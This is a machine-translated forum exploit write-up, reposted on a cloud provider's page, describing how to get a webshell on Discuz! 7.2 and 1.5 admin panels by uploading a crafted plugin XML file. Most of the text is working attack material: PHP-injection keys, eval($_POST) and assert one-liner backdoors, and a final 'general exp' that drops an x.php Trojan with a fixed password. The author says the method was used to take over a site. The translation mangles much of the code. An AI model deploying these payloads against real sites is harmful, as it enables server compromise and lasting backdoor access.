Dz7.2 & amp; 1.5 use shell in the background [no non-founder of ucenter]

Source: Internet
Author: User

This is the case that the ucenter and manyou plug-ins are not vulnerabilities and are not the Founders.
6.0 and 7.0 won't be mentioned. Just start,
7.2 first.
At the end of the article, you can use base64_encode (serialize ($ a) to get Webshell .'
I tried it for a long time and got a 7.2 background trial.
The method is to add an xml file in the plug-in.
This Code is applicable to both 7.2 and 1.5.

<? Xml version = "1.0" encoding = "ISO-8859-1"?>
<Root>
<Item id = "Title"> <! [CDATA [Discuz! Plugin]> </item>
<Item id = "Version"> <! [CDATA [7.2]> </item>
<Item id = "Time"> <! [CDATA []> </item>
<Item id = "From"> <! [CDATA [Discuz! Board (http: // localhost/Discuz_7.2_ SC _UTF8/upload/)]> </item>
<Item id = "Data">
<Item id = "plugin">
<Item id = "available"> <! [CDATA [0]> </item>
<Item id = "adminid"> <! [CDATA [0]> </item>
<Item id = "name"> <! [CDATA [www]> </item>
<Item id = "identifier"> <! [CDATA [shell]> </item>
<Item id = "description"> <! [CDATA []> </item>
<Item id = "datatables"> <! [CDATA []> </item>
<Item id = "directory"> <! [CDATA []> </item>
<Item id = "copyright"> <! [CDATA []> </item>
<Item id = "modules"> <! [CDATA [a: 0 :{}]> </item>
<Item id = "version"> <! [CDATA []> </item>
</Item>
<Item id = "version"> <! [CDATA [7.2]> </item>
<Item id = "language">
<Item id = "scriptlang">
<Item id = "a"> <! [CDATA [B]> </item>
<Item id = "); phpinfo () ;?> "> <! [CDATA [x]> </item>
</Item>
</Item>
</Item>
</Root>
After uploading the file, generate the shell. lang. php file in the forumdataplugins folder.
The content is as follows:
 
<? Php
$ Scriptlang ['shell'] = array (
'A' => 'B ',
'); Phpinfo ();?> '=> 'X ',
);
 
?>
See,; phpinfo ();?> The statement is normal when it is written with the header file.
Access shell. lang. php to display phpinfo normally. Since it can be written, it indicates that shell is certainly available.
Then try to write a sentence directly.
Directly put; phpinfo () ;?> Replace with; @ eval ($ _ POST ['adm1n']);?> Try.
The upload result is as follows:
 

 
When you see '', it is clear that it must have been replaced and added. Open the source file and see:
 
<? Php
$ Scriptlang ['shell'] = array (
'A' => '=> 1); @ eval ($ _ POST ['admin163']);?> ")?> ',
);
 
?>
It is invalid if it is added before single quotes. Try another one without single quotes.
Use this
 
<? Php ($ _ = @ $ _ GET [admin163]). @ $ _ ($ _ POST [org])?>
Open the file shell. lang. php directly, and the blank is displayed. It should be successful.
Can I enter an address in one sentence? Adm1n = assert display
")?> ',);?>
It indicates that the closure takes effect and runs perfectly.
The source code of the file is as follows:

<? Php
$ Scriptlang ['shell'] = array (
'A' => '=> 1); ($ _ = @ $ _ GET [admin163]). @ $ _ ($ _ POST [org])?> ")?> ',
);
 
?> Put together a perfect sentence:
<? Php ($ _ = @ $ _ GET [adm1n]). @ $ _ ($ _ POST [org])?>
Successfully connected a sentence...
-------
Let's talk about it here. It's an accident. How can it be changed so easily ..
At that time, I took the station, and this was not enough. At that time, I didn't use other Station Tests of dz7.2, and I couldn't look at the source code .. in addition, php still does not return an error. I don't know what's going on at all, but I don't know if it is a single quotation mark, because I tried a variety of single quotation marks without quotation marks .. none .. an attempt to create a file fails to write a sentence. admin163.net micro-Forum
The kill-free problem has also been considered. base64_encode (serialize ($ a) is a variety of attempts .. this directory can generate shell. lang. the PHP file indicates that it is writable and there is no non-writable problem .. at that time, I really wanted to break my head .. last use
 
<Php fputs (fopen ("x. php", "a"), "a")?>

Such a character is written ..
This article has been written so much. Rewriting is troublesome ..
------
In addition, 1.5 is the same as above ..
Let's get a general exp ..
 
<? Xml version = "1.0" encoding = "ISO-8859-1"?>
<Root>
<Item id = "Title"> <! [CDATA [Discuz! Plugin]> </item>
<Item id = "Version"> <! [CDATA [7.2]> </item>
<Item id = "Time"> <! [CDATA []> </item>
<Item id = "From"> <! [CDATA [Discuz! Board (http: // www.2cto.com/Discuz_7.2_ SC _UTF8/upload/)]> </item>
<Item id = "Data">
<Item id = "plugin">
<Item id = "available"> <! [CDATA [0]> </item>
<Item id = "adminid"> <! [CDATA [0]> </item>
<Item id = "name"> <! [CDATA [www]> </item>
<Item id = "identifier"> <! [CDATA [adm1n]> </item>
<Item id = "description"> <! [CDATA []> </item>
<Item id = "datatables"> <! [CDATA []> </item>
<Item id = "directory"> <! [CDATA []> </item>
<Item id = "copyright"> <! [CDATA []> </item>
<Item id = "modules"> <! [CDATA [a: 0 :{}]> </item>
<Item id = "version"> <! [CDATA []> </item>
</Item>
<Item id = "version"> <! [CDATA [7.2]> </item>
<Item id = "language">
<Item id = "scriptlang">
<Itemid = "a"> <! [CDATA [=> 1); fputs (fopen ("x. php", "w"), "<? Eval ($ _ POST [f4ck]);?>]> </Item>
</Item>
</Item>
</Item>
</Root>
Directly upload the plug-in, and then open it directly.
Forumdata/plugins/adm1n. lang. php
The file will generate a statement Trojan x. php with the password f4ck in the local directory.
That's all. Embarrassing. wait and think about the subject ..

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.